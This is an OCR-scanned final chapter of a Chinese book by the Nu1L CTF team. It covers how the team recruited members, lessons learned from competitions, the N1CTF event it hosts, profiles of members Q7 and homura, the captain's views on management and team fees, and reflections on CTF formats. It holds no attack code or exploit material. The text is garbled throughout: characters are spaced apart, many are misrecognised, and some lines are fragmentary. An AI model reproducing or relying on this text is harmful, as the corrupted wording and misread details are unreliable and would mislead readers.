2016 和 年， 全国 CTF 竞 赛 处 于 一 个 井喷 期 ， 几 乎 周 周 有 线 上 赛 ， 月 月 都 有 线 下 赛 。 然 而 当时 Nu1L 战 队 
的 参赛 选手 并 没有 很 多 。 面 对 赛 多 人 少 的 窘境 ， 如 何 招揽 精英 ， 扩 充 队伍 便 成 了 摆 在 我 们 面前 勤 待 攻 
克 的 难题 。 于 是 ， 我 们 先 把 在 2015 年 ISCC 线 下 赛 认识 的 一 些 技术 不 错 的 朋友 拉 入 了 战队 ， 如 编写 本 
书 APK 内 容 的 陈 耀 光 。 同 时 ， 在 各 大 CTF 群 里 召集 一 些 技术 实力 极 强 且 志同道合 的 朋友 ， 如 编写 XSs 
内 容 的 画 船 听 雨 。 然 后 ， 通 过 队友 推荐 、 招 纳 了 不 少 能 人 ， 如 Wxy191 是 画 船 听 雨 推荐 的 。 经 过 几 轮 
紧锣密鼓 地 招贤 纳 士 ，Nu1l 战 队 的 人 员 逐 渐 充 实 了 起 来 。 


队伍 拉 起 来 了 ， 但 是 随 之 产生 了 新 的 问题 。2017 年 年 未 ， 我 们 的 部 分 队员 因为 工作 或 者 学 业 的 原因 
他 骨 以 Nu1l 的 喘 份 参 与 比赛 ， 战 队 如 何 才 能 保证 持续 的 战斗 力 成 为 了 我 们 必须 思考 的 问题 。 与 2016 
年 不 同 的 是 ， 届 时 CTF 已 十 分 火热 ， 诸 多 新 生 战 队 正在 崛起 。 这 也 意味 着 有 很 多 “ 散 将 ” 正 待 “ 择 民 


木 而 栖 ”。 于 是 我 们 一 方面 按照 之 前 的 模式 继续 扩展 战 了 从， 如 acd 和 homura 是 Wxy191 推 荐 的 ， 另 
一 方面 上 线 了 Nu1L 战 队 的 官网 https://nu1lcom ， 让 有 意 入 队 的 朋友 可 以 在 官网 发 送 自己 的 简历 加 
入 我 们 。 这 开拓 了 战队 的 纳 新 渠道 和 视野 ， 也 让 这 份 充满 热情 的 事业 从 单 向 索 戏 变 为 双向 选择 。 后 
来 ,我 们 发 布 了 诸如 “Nu1L 2.0” 计 划 来 吸纳 更 多 的 新 鲜血 液 。 


= :ESN a El 
队 。 人 员 的 进入 和 退出 已 经 形成 了 科学 、 有 效 的 体系 ， 有 能 力 面 对 未 来 更 多 、 更 艰难 的 处 境 。 很 多 朋 
会 问 ， 如 何 加 入 我 们 ， 不 会 打 CTF 行 不 行 ? 其实 加 入 我 们 只 需要 满足 以 下 条 件 即 可 : 


4 爱国 ， 无 不 良 嗜 好 ， 严 禁 从 事 黑 灰 产 等 相关 行为 。 
4 热爱 分 享 ， 能 与 人 友好 交流 ， 不 傲 不 py。 

4 喜欢 CTF 比 赛 并 能 够 参与 学 习 或 者 对 某 一 技术 领域 有 较 深 的 了 解 。 
4 有 集体 荣誉 感 ， 服 从 战队 安排 


如 果 您 符合 以 上 几 点 ， 那 么 欢迎 友 送 个 人 简历 到 root@nu1l.com。 我 们 期 待 您 的 加 入 ! 
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13.2 上 下 而 求索 

CTF 之 路 道 阻 目 长 ，Nu1l 战 队 发 展 至 今 ， 参 赛 过 程 中 也 过 到 了 不 少 问 题 。 面 对 问题 ， 解 决 问题 是 我 们 
战队 的 应 对 逻辑 。 因此， 久而久之 也 积累 了 一 些 经 验 。 在 这 里 只 是 将 我 们 遇 到 的 一 些 典 型 问题 及 解决 
问题 的 经 验 分 享 出 来 ， 如 有 不 妥 之 处 ， 还 请 指正 。 

1. 线 下 赛 如 何 组 队 


在 CTF 线 下 赛 中 ， 不 同 的 比赛 类 型 往往 需要 不 同 的 组 队 类 型 。 例 如 ， 在 2019 年 Xparty 线 下 赛 中 ， 因 为 
是 靶场 渗透 没有 二 进 制 相关 题目 ， 所 以 我 们 派出 了 3 位 渗透 选手 和 1 位 懂 端 口 转发 的 RE 选手 ， 正 是 这 种 
合理 的 人 员 搭 配 ， 让 我 们 在 比赛 中 获得 了 第 一 名 。 


2. 如 何 提高 比赛 效率 


在 我 们 最 开始 的 比赛 过 程 中 ， 战 队 内 部 的 各 方向 的 做 题 人 员 互 相 之 间 没 有 沟通 ， 导 致 多 人 同时 在 解 
个 题目 却 互相 不 知道 。 例 如 ， 最 知 众 的 情况 : 


a 在 群 里 说 :“ 这 个 题 我 做 完了 ”。 
然后 b 紧 接 着 说 :“ 我 也 快 做 出 来 了 ， 我 以 为 没 人 做 这 个 题 。” 


这 就 耗费 了 相当 大 的 人 员 精 力 ， 于 是 经 过 不 断 思 考 和 借鉴 学 习 ， 推 荐 notion (https://www. 
iedlell 
= 


3. 问题 反思 


企 2019 年 国内 的 一 场 赛 事 中 ， 我 们 的 队员 因为 不 小 心 下 氏 了 队伍 附件 ， 如 附件 名 称 是 题目 名 称 _ 随 
数 .zip， 而 不 同 队 伍 的 附件 只 有 随机 数 不 同 且 平台 没有 每 权 ， 在 本 来 能 一 血 的 情况 下 ， 我 们 提交 了 负 
误 附 件 的 flag， 导 致 被 花 赛 。 尽 管 与 赛事 裁判 组 做 了 充分 解释 ， 但 最 后 按照 比赛 规则 只 能 按照 违规 处 
理 蒜 赛 。 企 比赛 过 程 中 ， 我 们 选择 遭 守 比赛 规则 ， 承 担 起 目 己 责任 ， 服 从 裁判 组 的 判定 。 


赛 后 我 们 进行 了 内 部 讨论 和 反思 ， 于 是 现在 我 们 在 比赛 过 程 中 ， 多 数 情 况 下 都 是 共用 一 个 账号 ， 并 EE 
由 一 个 人 专门 将 题目 附件 确认 好 放 到 notion 中 ， 这 样 就 避免 了 上 述 问题 的 发 生 。 


这 里 想 说 的 是 ， 在 比赛 中 过 到 一 些 突 发 情况 时 ， 一 定 要 遵守 比赛 规则 、 稳 定 情绪 ， 毕 竟 主 办 方 举办 赛 
EL =: bE 
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13.3 多 面 友 展 的 Nu1l 战 队 


除了 打 比 赛 ， 我们 还 做 了 很 多 有 意思 的 事 ， 下 面 一 一 道 来 。 


13.3.1 承办 比赛 


1. N1CTF 


从 2018 年 开始 ， 我 们 开始 举办 N1CTF 这 一 CTF 赛 事 。 那 么 ， 一 个 战队 为 什么 要 办 一 场 比赛 ? 在 我 所 
来 ， 有 以 下 原因 。 


(1) 宣传 因素 


举办 一 场 比赛 也 是 对 一 个 战队 的 最 好 宣传 方式 ， 惑 像 成 信 三 叶 草 举办 的 “ 极 客 大 挑战 ”， 除 了 吸纳 本 
校 新 的 成 员 ， 也 是 对 目 己 战队 的 一 种 展 好 的 宣传 方式 。 这 也 是 Nu1lL 举 办 一 场 高 质量 CTF 的 原因 。 


(2) 情结 因素 


其 实 作为 一 个 CT 战队 ， 除 了 打 比 赛 ， 从 参赛 选手 到 出 题 人 ， 办 一 场 属于 自己 的 CTF 比 赛 是 非常 有 意 
义 的 。 


(3) 技术 因素 


作为 一 个 顶尖 的 CTF 战 队 ， 内 部 成 员 上衣 定 会 有 一 些 好 玩 的 技术 点 ， 本 着 分 享 的 原则 ， 于 是 促成 了 将 技 
术 操 转换 为 题目 的 CTF， 本 质 意 义 也 是 希望 更 多 的 人 从 CTF 比 赛 中 能 够 学 到 东西 


当然 ， 受 到 全 球 CTFer 的 好 评 才 是 最 开心 的 事情 ， 如 N1CTF2019 获 得 了 CTFTIME 的 权重 值 满分 。 另 
外 ， 我 们 将 部 分 题目 也 开源 到 Github: https://github.com/Nu1LCTF。 


CTFWPQ@NUITIL 
星 主 : Nu1L Team 
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长 按 扫 码 预览 社 群 内 容 
和 星 主 关系 更 近 一 步 


此 外 ， 我 们 将 曾经 参加 比赛 的 Writeup 都 免费 公开 到 大 识 星球 ， 可 扫 摘 二 维 码 关 注 。 


2. “证 峰 极 客 ” 城 市 靶场 场景 


企 2019 年 ， 我 们 有 和 与 春秋 GAME 实验 宇 共 同 负责 “ 赢 峰 极 客 ” 线 下 赛 城市 靶场 场景 ， 角色 也 从 | 
年 的 参赛 选手 变 成 了 出 题 方 ， 为 了 让 “ 广 诚 市 ”可 玩 性 更 高 ， 我 们 也 根据 春秋 GAME 要 求 的 主题 进 
行 设计 ， 融 入 了 相当 多 的 实际 案例 ， 具 体 可 以 扫 摘 二 维 码 阅读 这 篇 文章 。 














13.3.2 空 措 针 社区 


2019 年 ， 我 们 创立 了 “ 空 指针 ”高 质量 挑战 赛 社区 (https://www.npointer.cn/) = 
创造 一 个 好 玩 有 趣 的 高 质量 题目 学 习 分 享 平台 。 


13.3.3 安全 会 以 涡 进 


我 们 的 队员 也 乐于 参加 天 府 杯 、KCON、HITCON、Blackhat 等 国内 外 安全 会 议 上 发表 议题 ， 其 中 最 /| 
的 议题 沉 讲 者 才 是 高 中 生 。 


下 一 章 
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13.4 人 生 的 选择 

不 是 每 个 CTFer 生 来 就 有 打 CTF 的 天 赋 ， 也 并 不 是 折 有 人 都 能 对 生活 与 梦想 两 不 相 负 。CTF 究 竟 能 给 
们 的 人 生 带 来 什么 样 的 改变 ?这 是 每 个 CTFer 都 值得 去 思考 的 问题 。 我 们 想 分 享 Nu1L 战 队 核心 队员 Q 
7 和 homura 的 故事 ， 愿 大 家 能 在 其 中 找到 问题 的 答案 。 

年 少 干 帆 况 ， 一 路 破 风行 
A 


数 和 未 来 安稳 的 工作 埋 首 百 读 。 他 的 童年 和 青春 是 由 一 串 捉 代码 、 一 握 道 难题 垒 砌 的 城堡 ， 他 一 直 在 
数字 的 海洋 中 您 游 竞 逐 ， 其 乐 无 穷 。 


束 像 许多 电影 里 描写 的 天 才 少 年 的 故事 ， 他 从 小 学 束 利 用 课余 时 间 目 学 编程 和 奥数 ， 任 从 数学 苋 赛 
的 优异 成 绩 被 天 津 光 华中 学 录取 。 上 了 中 学 ， 他 的 天 地 更 加 广阔 。 与 志同道合 的 朋友 一 起 上 自学 C 语 
言 、 数 据 结 构 与 算法 ， 多 次 参加 了 全 国信 息 学 奥林匹克 联赛 (NOIP) 。 


丈 是 在 那 时 ， 他 推 开 了 CTF 世 界 的 大 门 。 


企 一 次 计算 机 比赛 中 ，Q /与 天 津 市 电化 教育 馆 吉 师 交 流 时 了 解 到 了 信息 安全 这 一 陌生 而 昼 秘 的 领域 。 

2013 年 ， 他 参加 了 北京 理工 大 学 兴办 的 |3CC 比 赛 ， 从 此 路 上 了 征 眠 CTF 之 路 。 这 对 他 而 言 ， 是 转折 更 

是 充满 期 竺 的 全 新 挑战 。 此 后 ， 他 目 主 学 习 Web 安 全 方面 的 入 门 教 程 ， 利 用 虚拟 机 搭建 环境 ， 进 行 了 
rack 

。 经 过 一 年 学 习 ， 他 正式 投身 CTF 之 战 。 

刚 开 始 目 然 不 会 很 容易 ， 即 使 是 对 他 这 样 有 基础 和 悟性 的 年 轻 CTFer。 但 是 Q7 有 一 股 天 生 的 韧劲 ， 

次 比赛 后 ， 都 会 从 排名 靠 前 的 选手 的 Writeup 中 学 习 思 路 ， 举 一 反 三 。 在 一 次 次 的 磨 硕 中 ， 他 的 水 平 

是 局 了 ， 还 结识 了 当时 国内 知名 的 Sigma 战 队 队 员 并 加 入 该 战队 ， 一 起 参加 了 XCTF 联 赛 的 多 场 比赛 。 


故事 到 这 里 并 没有 结束 ， 在 童 适 性 教育 的 规则 下 ，Q7 必 须 参加 高 考 。 或 许 是 因为 Q7 过 于 专注 CTF 和 
竞赛 而 忽略 了 文化 谍 的 学 习 ， 他 的 高 考分 数 不 太 理想 。 所 羊 ， 任 借 着 信息 学 奥林匹克 竞赛 和 CTF 成 绩 
的 加 分 ， 他 最 终 还 是 被 上 海 科技 大 学 录取 。 但 是 ， 困 难 随 之 而 来 。 


由 于 上 海 科技 大 学 刚刚 成 立 ， 招 生 人 数 不 多 ， 他 在 大 学 里 基本 找 不 到 可 以 一 起 参加 CTF 比 赛 的 朋友 . 
离开 了 池塘 却 登 上 了 一 座 孤 岛 ， 这 让 他 很 是 头疼 ， 却 也 无 奈 。 正 如 《牧羊 少年 奇幻 之 旅 》 中 所 说 ， 
“没有 一 颗 心 ， 会 因为 追求 梦想 而 受伤 。 当 你 真心 渴望 某 样 东西 时 ， 整 个 宇宙 都 会 来 帮忙 。” 在 一 次 
比赛 后 ，Q7 认 识 了 Nu1L 战 队 的 albertchang。 绪 树 三 古 ， 终 得 枝 可 依 ， 由 此 Q7 加 入 了 Nu 才 战 队 ， 
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人 在 Nu1L 战 队 的 这 几 年 中 ， 他 不 再 格格 不 入 ， 不 再 受 红 束 ， 这 是 属于 他 的 世界 。 身 边 是 和 他 一 样 逐 芭 
的 同道 好 友 ， 一 起 比赛 ， 相 互 扶持 ， 共 同 进步 。 往 后 一 路 也 许 并 非 旬 途 ， 但 终究 不 再 扳 车 理 战 ， 迷 范 
兴叹 。 


任 大 一 暑假 时 ， 他 企 3igma 战 队 队友 的 推荐 下 加 入 了 腾讯 科恩 实验 室 ， 从 事 汽 车 安全 相 天 的 研究 。Q7 
很 快 适 应 了 实习 工作 ， 这 主要 得 益 于 他 在 一 次 次 CTF 比 赛 中 学 到 的 逆向 、 密 码 学 等 知识 和 练习 出 来 的 
快速 学 习 能 力 。 天 赋 和 努力 ， 人 在 Q7 身 上 都 看 得 到 。 


有 一 次 闲聊 时 ， 我 问 Q7: “你 免得 CTF 市 给 了 你 什么 ? ”他 没有 急 着 回答 我 ， 只 是 看 着 我 天 了 舌 。 那 
一 刻 ， 我 知道 他 想 说 什么 。 束 像 是 每 位 CTFer 一 样 ，CTF 意 味 着 坚持 与 无 悔 ， 是 每 个 自由 灵魂 的 探 
索 、 狂 欢 与 成 惑 。Q7 襄 过 ，CTF 是 一 场 有 趣 的 游戏 ， 而 这 场 游 戏 从 不 扳 独 。 他 很 享受 每 一 次 的 征战 ， 
无 天 成 绩 。 


从 国内 比赛 到 国际 比赛 ， 从 线 上 赛 到 线 下 赛 ，Qy7 的 战绩 檬 一 次 次 刷新 ， 身 边 的 同道 好 友 也 越 来 越 多 。 
回头 看 看 他 目 己 的 CTF 之 路 和 最 急 的 选择 ， 他 况 “ 不 后 悔 ”。 


欧 想 不 负 勇 十 


人 们 经 弟 用 合 不 合适 来 评价 一 个 人 从 事 某 一 行 的 潜力 。 有 时 候 “ 不 合适 ”也 成 为 了 “放弃 ”的 代 名 
词 。 如 果 这 样 说 的 话 ， 相 比 于 Q7，homura 是 一 个 实在 不 适合 进入 CTF 圈 子 的 人 。 


相 比 于 Nu1L 战 队 里 很 多 大 学 前 就 有 多 年 编程 经 验 ， 中 学 就 开始 参加 全 国信 息 学 奥林匹克 联赛 的 大 
借 ，homura 只 是 从 小 对 计算 机 感 兴趣 ， 上 略微 懂 一 点 C/C++ 而 已 ， 可 以 说 是 个 外 行 。 


偏偏 他 是 个 执 描 的 人 ， 仿 偏 他 爱 上 CTF。 虽 然 不 合 运 ， 他 却 报 定 了 他 天 改 侣 的 勇气 ， 似 乎 准 也 阻挡 不 
了 他 追求 梦想 的 脚步 。 


PAN E25 :DT = 
军 失 弟 ， 分 数 只 够 报考 乐 南 大 学 的 医学 院 。 “父母 之 爱 子 ， 则 为 之 计 深 远 ”，homura 父 母 从 现实 的 
志 得 学 医 比 学 软件 好 ， 会 是 一 份 安稳 的 工作 ， 于 是 极力 劝说 homura 报 考 乐 南大 学 医学 


和 梦想 失之交臂 ， 这 是 现实 第 一 次 告诉 homura “不 合适 ”。 但 是 他 天 生 反 骨 ， 并 没有 放弃 自己 的 坚 
持 ， 即 使 希望 渺 落 也 要 放手 一 搏 。 他 想 ， 去 了 医学 院 再 争取 转 系 ， 或 许 能 成 。 


理想 思 比 现实 美好 ， 也 许 这 就 是 成 长 的 痛 ， 让 我 们 一 步 步 清 醒 ， 一步 步 找到 自己 人 生 的 航向 和 定位 。 
homura 唯 一 的 希望 一 一 转 系 考试 一 一 失败 了 。 这 是 现实 第 二 次 告诉 他 ,他 “不 合适 ”。 
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他 融 此 有 协 的 话 ， 也 许 将 来 会 是 医生 里 最 会 编程 的 人 。 可 是 终究 不 是 他 最 初 的 梦想 了 。 转 系 失败 后 的 
半年 是 homura 二 十 几 载 生命 里 最 低落、 最 无 望 的 半年 。 也 正 是 这 半年 ， 让 他 想 明 折 了 目 己 真正 的 
' 不 合适 "一 一 成 为 一 名 医生 。 他 心中 不 甘 让 CTF 之 梦 就 此 止步 ， 于 是 他 做 了 一 个 让 许多 人 咱 舌 而 性 
步 的 决定 ， 从 东南 大 学 退学 。 


退学 ， 常 常 作为 一 种 玩笑 出 现在 对 上 自己 专业 失望 的 大 学 生 嘴 边 。 但 是 真正 去 做 的 人 少 之 又 少 ， 如 果 心 
中 没有 坚定 的 追求 ， 没 人 能 真正 路 出 那 一 步 。 那 代表 着 容 出 自己 的 所 有 ， 与 现实 抗争 。 江 苏 学 业 水 平 
UNE: ll 
次 “小 高 考 ”。 不 仅 如 此 ， 小 高 考 拿 A 虽 可 以 在 高 考 时 加 分 ,但 往届 生 除 外 。 这 让 homura 也 会 反问 目 
己 ， 退 学 是 不 是 一 个 正确 的 人 生 选 择 。 


事实 上 ， 他 是 对 的 。 虽 然 经 历 了 许多 挫折 ， 最 终 homura 还 是 如 愿 考 入 了 南京 邮电 大 学 软件 工程 系 。 
这 次 ， 他 证 明了 自己 比 任何 人 更 合适 做 一 名 CTFer。 此 去 一 路 ， 拨 云 见 月 。 因 为 高 等 数学 、 大 学 物理 
这 些 最 令 大 学 生 头 疼 的 基础 课 ，homura 在 东南 大 学 都 已 经 学 过 ， 课 业 的 压力 对 他 相对 较 小 。 于 是 ， 
他 开始 去 找 感 兴 趣 的 社团 玩 ， 正 好 遇 上 科 协 招 新 ， 而 负责 招 新 的 人 正 是 Nu1L 的 Wxy191 (Nu1L 的 第 
一 批 核心 选手 ) 。 


当时 科 协 招 新 是 要 笔试 的 ，homura 看 了 看 题 ， 只 是 初级 入 门 的 题目 ， 对 他 来 说 没有 可 考 性 。 于 是 拿 
着 试卷 对 Wxy191 说 : “可 不 可 以 不 做 这 种 试卷 ?“" 


Wxy191 看 着 眼前 这 个 “狂人 ”， 心 中 很 是 惊喜 ， 因 为 很 少 碰 到 这 样 的 人 ， 凡 是 说 这 话 的 人 定然 有 所 
水 平 。 他 和 关 了 和 关 ， 友 给 了 homura 一 个 链接 (南京 邮电 大 学 CTF 训 练 平台 ) ， 打 算 试 一 试 他 的 底 。 
“你 要 是 能 在 这 上 面 做 到 3000 分 ， 就 可 以 不 用 做 试卷 ”。 


homura 领 了 试题 ， 起 初 只 是 好 奇 ， 因 为 这 是 第 一 次 与 CTF 亲 密 接触 。 没 想到 在 一 步 步 解 题 的 过 程 
中 ， 他 切实 体验 到 了 其 中 的 乐趣 。 大 概 伦 了 一 周 的 时 间 ， 便 做 到 了 3000 分 ， 顺 利加 入 了 科 协 。 Wo 

没有 看 错 人 ，homura 确 实 是 有 水 平 的 。 但 是 后 来 认识 homura 的 人 多 是 只 知道 他 的 天 赋 ， 却 不 知 
EDEN A NE pa a 


在 加 入 科 协 后 不 久 的 新 生 杯 CTF 比 赛 中 ，homura 认 识 了 acdxvfsvd、 梅 子 酒 等 校内 选手 。 之 后 ，Wx 
191 珊 着 他 们 打 一 些 CTF 比 赛 。 从 此 homura 开 始 了 他 的 CTF “ 赛 棍 ” 之 路 。homura 第 一 次 去 线 下 寺 
NJCTF 时 ， 与 acdxvfsvd、 梅 子 酒 、dogboy 一 队 。 昌 然 第 一 次 只 拿 了 三 等 奖 ， 现场 友 了 800 元 奖金 。 
但 是 他 比 现在 拿 了 10 万 奖金 还 开心 。 因 为 那 一 次 的 赢 ， 让 他 曾经 的 勇敢 和 拼搏 都 值得 了 。 


合适 ， 还 是 不 合适 ， 终 究 是 目 己 说 了 算 。 


2018 年 初 , homura 经 Wxy191 介 绍 ， 加 入 了 Nu1L 战 了 从， 并 逐步 成 为 Nu1L 的 核心 主力 选手 。 现 在 人 
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学 和 软件 工程 的 选择 ， 他 会 对 目 己 说 : “ 趁 青春 ， 勇 敢 去 做 。" 


https://weread.qq.com/web/reader/77d32500721a485577d8eeek98d321b025d98dce83da05a 





2021/1/16 从 0 到 1: CTFer 成 长 之 路 -Nu1L 战 队 - 微 信 读 书 


13.5 战队 队长 的 话 
一 个 团队 必须 有 一 个 管理 者 ， 这 个 管理 者 不 一 定 是 技术 能 力 最 强 的 ， 但 是 这 个 管理 者 一 定 要 有 综合 运 
维 的 能 力 ， 一 定 要 时 刻 想 着 如 何 给 战队 的 队员 创造 最 省 心 的 比赛 环境 ， 谋 划 最 优 的 福利 。 我 从 一 开始 
丈 担 任 Nu1L 战 队 的 队长 ， 在 战队 成 长 的 同时 ， 我 目 己 其 实 也 在 成 长 ， 下 面向 单 分 享 我 的 看 法 : 
%» 人 员 问 题 。 在 我 上 腿 里 ，“ 多 个 一 ”到 整体 与 “多 个 多 ”到 整体 完全 不 一 样 ， 前 者 是 多 个 个 
体 ， 后 者 是 多 个 圈子 ， 所 以 联合 战队 并 不 一 定 非 要 人 多 ， 只 要 整齐 划一 焉 好 。 
们 比赛 于 我 而 言 只 是 一 个 乐趣 ， 更 加 希望 队员 有 更 好 的 发 展 。 如 我 们 的 主力 队员 有 的 因为 工 
EN pe > 4 = A = 
上 友 展 而 开心 的 。 
他 融合 问题 。 因 为 人 越 多 残 越 难 管理 ， 所 以 首先 要 互相 熟悉 ， 其 次 是 加 入 前 必须 满足 上 自己 的 
战队 考核 标准 ， 这 样 瓯 可 以 师 选 相当 一 部 分 人 。 


令 为 队友 着 想 ， 不 喜欢 的 比赛 不 打 ， 不 能 参加 的 不 强求 ， 不 恰当 的 安全 培训 不 接 ， 每 个 人 都 


有 目 己 的 生活 ， 比 赛 只 是 一 种 提升 技术 的 途径 ， 只 是 一 个 爱好 而 已 。 


冬 队 费 问题 相信 和 是 摆 在 很 多 联合 战队 面前 的 难题 。 在 Nu1L 中 ， 我 们 一 般 会 有 以 下 两 种 收集 队 
费 的 情况 : 一 是 将 线 上 赛 奖金 不 多 的 纳入 队 费 ， 如 1000 ~ 5000 元 ; 二 是 线 下 赛 的 大 额 奖 金 
部 分 ， 如 DEFCON China BCTF 2018 中 ， 我 们 从 30 万 元 的 奖金 ( 税 后 24 万 元 ) 中 拿 出 4 万 
元 ， 作 为 队 费 和 举办 N1CTF2019 的 比赛 所 需 。 队 费 还 会 用 于 以 下 情况 : 一 是 负责 主办 方 不 报 
销 差旅费 的 比赛 的 差旅费 ， 二 是 比赛 期 间 的 打车 、 夜 消费 用 ， 三 是 比赛 结束 的 聚餐 。 
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小 结 


到 这 里 ， 本 书 的 内 容 束 告 一 段 藻 了 ， 正 如 开头 所 说 ， 这 是 我 们 Nu1L 第 一 次 写 书 ， 所 以 其 中 难免 存在 
销 误 ， 也 希望 各 位 读者 将 问题 以 及 建议 上 友 达 邮件 到 book@nu1l.com， 日 后 会 住 重 印 时 进行 更 新 。 


最 后 ， 作 为 一 个 参加 CTF 比 赛 ? 年 多 的 选手 ， 谈 一 下 自己 天 于 CTF 比 赛 的 看 法 。 
CTF 的 意义 


其 实 大 部 分 人 一 开始 打 CTF 比 赛 ， 只 是 为 了 好 玩 或 者 提升 自身 的 技术 水 平 。 在 不 断 的 成 长 过 程 中 ，6 
能 CTF 对 于 每 个 人 的 意义 也 会 有 很 多 不 同 。 所 以 ， 我 只 是 讲 一 下 目 己 的 目 身 经 历 和 CTF 对 目 己 的 意 
义 。 企 参加 很 多 场次 CTF 后 ， 企 我 眼 里 ，CTF 的 意义 有 如 下 : 


@@ 入 门 网 络 安全 的 最 快 途 径 ， 没 有 之 一 。 很 多 实战 派 的 人 会 训 CTF 比 赛欧 是 脑 洞 ， 与 实战 完全 不 
致 ， 但 是 CTF 是 入 门 网 络 安全 的 最 快 途径 ， 没 有 之 一 。 当 然 ， 不 是 况 参 加 CTF 的 选手 惑 没有 实战 大 
佬 ， 如 Nu1l 战 队 中 就 有 很 多 实战 经 验 丰 富 的 选手 。 


@ 认 识 很 多 朋友 。 其 实 CTF 圈 子 或 者 安全 圈子 都 很 小 ， 所 以 经 常 与 队友 聚餐 、 交 流 反 术 是 一 件 很 六福 
的 事情 。 


四 针对 学 生 芜 的 福利 。 近 几 年 ，CTF 竞 赛 已 经 获得 各 层面 的 认可 ， 有 的 学 校 已 经 将 CTF 莞 赛 成 绩 纳 入 
保 研 的 认证 学 围 ， 有 的 安全 公司 招 人 也 会 将 CTF 比 赛 成 绩 作 为 加 分 项 之 一 ， 所 以 CTF 打 得 好 ， 除 了 能 
赚 生 活 费 提升 自身 实力 ， 更 多 的 可 能 对 以 后 的 友 展 有 帮助 。 


@ 提 高 独自 解决 问题 的 能 力 。CTF 的 技术 面 其实 很 广 ， 有 些 偏 门 的 技术 面 可 能 在 现实 情况 并 不 会 遇 
到 ， 所 以 这 时 就 会 提高 目 己 解决 问题 的 能 力 ， 通 过 不 断 测试 和 翻阅 相关 文档 来 解决 题目 。 


@ 学 习 接 触 前 治 技术 。 近 几 年 的 CTF 中 其 实 已 经 出 现 了 很 多 前 沿 技 术 ， 如 区 块 链 、RHG 比 赛 等 。 很 
新 鲜 的 CVE 漏 洞 也 被 用 于 CTF 的 题目 。 所 以 ， 参 赛 者 可 以 从 中 学 习 新 技术 ， 填 补 上 自己 的 知识 盲区 。 


当然 ， 其 实现 在 的 CTF 圈 子 ， 环 境 越 来 越 浮 躁 ， 但 是 希望 那些 真正 热爱 CTF 比 赛 的 参赛 者 坚持 下 去 ， 
摆 正 心态 ， 全 力 以 赴 ， 玩 得 开心 残 好 。 


CTF 应 该 是 什么 梓 的 


近 几 年 ， 国 内 CTF 一 直 处 于 井喷 期 ， 有 的 比赛 被 称赞 ， 有 的 比赛 令 贬 低 ， 可 能 是 参赛 选手 的 问题 ， 
终 


可 能 是 赛制 的 问题 ， 也 可 能 是 出 题 人 的 问题 ， 也 可 能 是 主办 方 的 问题 。 而 CTF 现 阶段 终究 是 一 个 网 络 
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安全 夺 事 ， 所 以 最 主要 的 目的 是 塔 章 友 现 网 络 安全 人 才 ， 能 够 站 CTFer 有 上 所 期 性 ， 能 够 站 CTFer 学 到 
东西 。 


SED EI: A Es 
能 够 让 参赛 选手 从 中 学 到 新 鲜 技 术 ， 能 够 运用 到 实战 中 。 例 如 ，RWCTF、0CTF 等 都 是 优秀 赛事 ， 其 
余 高 质量 比赛 可 以 多 关注 国外 CTFTIME 或 者 国内 CTFHUB 平 从 。 


线 下 CTF 目 前 有 很 多 分 类 ,AWD、 和 靶场 渗透 、RHG 机 器 人 等 ， 这 里 笔者 结合 自身 参赛 情况 ， 说 一 下 主 
流 的 两 种 模式 : AWD 和 靶场 渗透 的 思考 。 


大 部 分 参加 过 线 下 AWD 的 参赛 者 都 会 遇 到 一 个 情况 : “PWN 题 目 数量 远 超 Web 题 目 数量 ”， 这 样 导 
致 Web 选 手 参赛 体验 感 极 差 ， 比赛 成 绩 主要 由 PWN 来 决定 。 所 以 ，AWD 比 赛 不 如 与 靶场 渗透 相 结 
合 ， 如 将 二 进 制 文件 藏 在 Web 题 目 中 ， 参 赛 者 需要 黑 盒 ， 拿 到 Web 相 关 权 限 ， 才 能 进行 PWN 题 目的 
攻防 。 


所 衣 轩 场 渗透 ， 其 实 殉 是 模拟 实战， 但 是 大 多 数 靶 场 渗透 都 是 Web 主 场 。2018 年 10 月 ， 永 信 全 茂 人 
为 技术 支撑 在 成 都 举办 了 首届 “ 赢 峰 极 客 ”城市 轩 场 赛 ， 其 中 不 光 有 Web， 也 有 PWN， 同 时 兼顾 了 
实战 攻击 、 匿 名 防护 等 。 尽 管 比赛 也 有 一 些小 缺陷 ， 但 是 不 妨碍 大 家 对 其 模式 的 好 评 。 


同时 相信 读者 中 肯定 有 比赛 出 题 人 员 ， 我 分 享 PWNHUB 平 台中 火 日 攻 天 写 的 一 篇 writeup ， 因 为 篇 幅 
略 长 ， 读 者 可 以 通过 在 Nu1L Team 公 众 号 回复 “ 火 日 攻 天 ”来 获取 ， 推 荐 读者 可 以 仔细 阅读 下 ， 相 
EFI = 


最 后 ， 愿 大 家 可 以 通过 CTF 比 赛 不 断 提 升 自己 ， 结 交 更 多 的 朋友 ， 收 获 友情 乃至 爱情 等 属于 自己 的 ; 
PA 


全 书 宛 
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